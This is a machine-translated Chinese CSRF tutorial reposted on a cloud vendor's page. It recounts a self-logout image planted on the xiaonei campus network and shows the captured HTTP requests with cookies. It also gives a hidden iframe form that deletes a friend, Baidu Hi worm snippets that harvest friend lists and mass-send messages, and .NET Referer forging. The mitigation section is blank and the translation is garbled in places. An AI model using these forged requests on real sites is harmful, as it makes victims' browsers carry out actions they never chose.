Web security practice (15) CSRF (Cross-Site Request Forgery)-start with inserting pictures in the school

Source: Internet
Author: User
Tags in domain csrf attack

Web security practice (15) CSRF (Cross-Site Request Forgery)-start with inserting pictures in the school

15.1 start from school

(1) simple results

It is said that the internal network is now China's largest student social networking website, and its security has changed from the first mess to the better. Client-side verification is also allowed from the beginning to add arbitrary code (html, css, script) until now only css is allowed, and keywords are filtered for server-side verification... I actually learned a lot when I was using the school. Occasionally write logs on campus, and you will inevitably pay attention to its editor.

This is all the functions of the editor. It does not allow you to view the source code. Of course, this is not a problem, because we know that the log rendering result must be html code. You can simply find an online editor and paste the edited content. However, I did a good job in the school and also filtered out the posted content. I tried to filter out all the script results on the server. Unconsciously, I made an advertisement for the school... Let's take a look at the log I sent:

Question: heihei

"You are here,

You are here,

But when you want to leave ....

It's already late...

"

The person who came to access my log on campus found that he jumped to this page when he wanted to leave:

 

Why don't I understand? How to exit... I am already scolded. Miserable! It is estimated that many people have been scolded.

(2) Inside View

Next we will analyze the http request of this simple log:

(1) The first request to log Content

GET/GetEntry. do? Id = 379593678 & owner = 201573034 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd. ms-xpsdocument, application/xaml + xml ,*/*

Referer: http://blog.xiaonei.com/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;. net clr 2.0.50727;. net clr 3.0.04506.648;. net clr 3.5.21022)
Accept-Encoding: gzip, deflate
Host: blog.xiaonei.com
Connection: Keep-Alive
Cookie: _ utma = Beijing; _ utmz = 204579609.1240405279.155.23.utmccn = (referral) | utmcsr = home.xiaonei.com | utmcct =/Home. do | utmcmd = referral; _ de = upper; id = 201800742; mop_uniq_ckid = 123.189.23.249 _ lower; _ r01 _ = 1; wpi_clew_cookie = exsit; lower = 0; homeNtcInf = 0; notifyTips201800742 = 1; xiaonei_stage = 20; bytes = 201573034; _ utmb = 204579609; depovince = LN; XNESSESSIONID = c9da0fa7aff8; _ utmc = 204579609; userid = 201573034; univid = 5426; gender = 1; univyear = 2005; societyguester = a2ac4d18338093affb56d55a2b96c90a4; kl = large; hostid = 201573034; jebecookies = 201573034 | 1 198| 5-1-5 | 20 | 0 | 5426 _; xn_app_histo_201573034 = 6-26302-3-20706-23446-20-9999-21461-8-17954-17940-2

 

This request returns the basic html code of the page.

 

(2) then, based on the elements in the html code analysis obtained in the first request, the request is sent to .

GET/Logout. do HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd. ms-xpsdocument, application/xaml + xml ,*/*
Referer: http://blog.xiaonei.com/GetEntry.do? Id = 379593678 & owner = 201573034
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;. net clr 2.0.50727;. net clr 3.0.04506.648;. net clr 3.5.21022)
Accept-Encoding: gzip, deflate
Host: www.xiaonei.com
Connection: Keep-Alive
Cookie: _ utma = Beijing; _ utmz = 204579609.1240405279.155.23.utmccn = (referral) | utmcsr = home.xiaonei.com | utmcct =/Home. do | utmcmd = referral; _ de = upper; id = 201800742; mop_uniq_ckid = 123.189.23.249 _ lower; _ r01 _ = 1; wpi_clew_cookie = exsit; lower = 0; homeNtcInf = 0; notifyTips201800742 = 1; xiaonei_stage = 20; province = 201573034; depovince = LN; XNESSESSIONID = c9da0fa7aff8; _ utmc = 204579609; userid = 201573034; univid = 5426; gender = 1; univyear = 2005; societyguester = a2ac4d18338093affb56d55a2b96c90a4; kl = large; hostid = 201573034; jebecookies = 201573034 | 1 | 1985-1-5 | 20 | 0 | 5426 _; xn_app_histo_201573034 = 6-26302-3-20706-23446-20-9999-21461-8-17954-17940-2

(3) Brief Analysis:

The reason for forcing the user to log out is the picture. The url of the image does not point to a real image, but "watermark. This request is sent by the browser, which is the first point. Second, you can easily notice that the browser carries a local cookie when sending any request, which is the most basic condition for the user to exit successfully. The server determines the user's identity and status based on the cookie. This example demonstrates the simplest request forgery.

15.2 Cross-Site Request Forgery Principle

(1) What is cross-site Request Forgery?

CSRF is an attack that spoofs client requests. CSRF stands for Cross Site Request Forgery, meaning Cross Site Request Forgery. Is to force the victim's browser to send requests to a vulnerable Web application, and finally achieve the operation required by the attacker.

(2) Types of Cross-Site Request Forgery

 

1. Website forgery. Intra-site forgery does not involve cross-origin, so it is relatively simple to implement. An example of intra-site forgery is used to insert images into the Intranet. We noticed that

"Referer: http://blog.xiaonei.com/GetEntry.do? Id = 379593678 & owner = 201573034 ". If" blog.xiaonei.com/#becomes "hi.baidu.com.pdf", this request will fail because of cross-domain access. If we submit a http://xiaonei.com/DelFriend.do? For a request with id = 200945709 & from = vu, the user with id 200945709 will be deleted from the list of friends of the current user. For worse examples, I will not give an example. In short, the current user has logged on. Theoretically, he will do what you want him to do. E-commerce websites may suffer worse if this happens.

2. Forgery outside the site. This is a cross-origin request submission method. Off-site forgery is also an effective way to make up for all kinds of defects of intra-site forgery. For example, if you cannot submit specific scripts or html code on the website, you can construct your own page on the website. The flexibility of off-site forgery is greater, so we have more options.

(3) get and post

A get request is like an image or a hyperlink we saw above. For many site spoofing requests, only post requests can be accepted, because in many cases post requests cannot be sent by themselves. However, we can also see that the post data is required, but the get method can also be successful due to programmer negligence. Request. Form, Request. QueryString, and Request are the three methods for asp.net to accept data. However, if you use the Request method, you cannot distinguish between get and post, allowing malicious attackers to take advantage of them. The Cross-Site forgery of the post method is almost all carried out in the out-site forgery. Because I can easily construct a form and then submit it.

(4) Relationship between browser security features and forged requests

Client cookies are the most common methods for user status recognition, permission management, authentication, and session persistence, however, our browser must attach cookies to requests such as , which provides the most basic guarantee for forged requests.

The following section describes the source network:

"According to the standard Set-Cookie format, the cookies currently supported by browsers are actually divided into two forms:
Set-Cookie: <name >=< value> [; <name >=< value>] [; expires = <date>] [; domain = <domain_name>] [; path = <some_path>] [; secure] [; HttpOnly]
One is the memory COOKIE. If the expires parameter of the COOKIE value is not set, that is, the COOKIE will become invalid after the browser is disabled, it is not stored locally. The other is to save the COOKIE locally, that is, to set the expires parameter. If the COOKIE value specifies the expiration time, the COOKIE will be saved locally and closed before accessing the website, during the COOKIE validity period, all requests will carry the local COOKIE.
Internet Explorer has A Privacy Report function. In fact, this is A security function that blocks all third-party cookies. For example, if A domain Web page is embedded with A file in Domain B, after the client browser accesses the Web page of Domain A, the COOKIE contained in the file request initiated by Domain B will be intercepted by IE. In addition to file requests, if the IFRAME frame is used to contain the Web page of Domain B, after accessing the Web page of Domain, all requests in the Web page of Domain B, including the COOKIE contained in the file request, will also be intercepted by IE. However, this security feature of Internet Explorer has two features: First, it does not intercept memory cookies, and second, it allows cross-origin access cookies when the website sets the P3P header, the Privacy Report function will not work.
Therefore, with this security feature of Internet Explorer, attackers need to conduct off-site CSRF attacks and use file requests to forge GET requests, the victim may succeed only when the memory COOKIE is used, that is, the session state for login is not saved. Firefox does not consider using such a function, so there is no limit on the CSRF attack outside the site.

"

15.3 common cross-site request forgery methods

I don't want to give a detailed example here. There is also relevant information on the Internet. You can refer to it for a purpose.

 

(1) Direct Request

It is essentially a get request. This method is direct and allows users to click a hyperlink and the browser to automatically request resources (such as and <script> tags ). If the link is included in the email, can the user Delete the email? I have never tried.

(2) post

Post data must be supported by JavaScript. Therefore, it is difficult to implement intra-site forgery (except for xss vulnerabilities). It is generally used for off-site forgery.

<iframe name="XX" display="none"><form method="POST" name="xxx"action=http://*****.com/deleteFriend.aspx><input type="hidden" name="ID”  value="2702455999"></form></iframe><script type="text/javascript">function DealFriend(){iframe = document.frames["XX"];iframe.document.Submit("xxx");}</script>

(3) Ajax call

Json data is widely used. Attackers can initiate requests to the data interface that returns json data to obtain some key data. Baidu hi worm attacks use json data to obtain a friend list and then spread scripts. Some code is as follows:

Dynamic acquisition of friend json data

var gotfriends = function (x) { for(i=0;i<x[2].length;i++) { friends.push(x[2][i][1]); } } loadjson(’<script src=”http://frd.baidu.com/?ct=28&un=’+lusername+’&cm=FriList&tn=bmABCFriList&callback=gotfriends&.tmp=&1=2″><\/script>’);

Core Components of infection information output and message sending

 

Evilurl = url + "/wish. php? From = "+ lusername +" & to = ";
Sendmsg = "http://msg.baidu.com /? Ct = 22 & cm = MailSend & tn = bmSubmit & sn = [user] & co = [evilmsg]"
For (I = 0; I <friends. length; I ++ ){
Omitted ................
Mysendmsg = mysendmsg + "&" + I;
Eval ('x' + I + '= new Image (); x' + I +'. src = unescape ("'+ mysendmsg + '");');
Omitted ................

Another method of Ajax is to request a script file or dynamically generate a script file page, and insert it to the current page to perform some operations. This is also one of the solutions for website forgery and random addition of code.

(4) forging an http Header

This is one of the countermeasures for cross-origin verification problems, usually forged Referer.

. Net can be set through code similar to this

HttpWebRequest myHttpWebRequest = (HttpWebRequest) WebRequest. Create (myUri );

MyHttpWebRequest. Referer = http://www.microsoft.com;

Or the Header attribute of HttpWebRequest.

To set the http header, attackers need to submit the information of the victim user to their own page, and then send the custom request sent to the target page to carry the authentication information of the victim.

(5) AJAX cross-origin Solution

The Knowledge mentioned here is a supplement and does not involve direct attacks. For more information, see related articles. Because there will be a lot of content in the specific talk, enough for a topic.

1. iframe nesting

2. Application proxy

3. script tag

15.4 Cross-Site Request Forgery Solution

.........

I want to give this part to readers. What do you think?

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.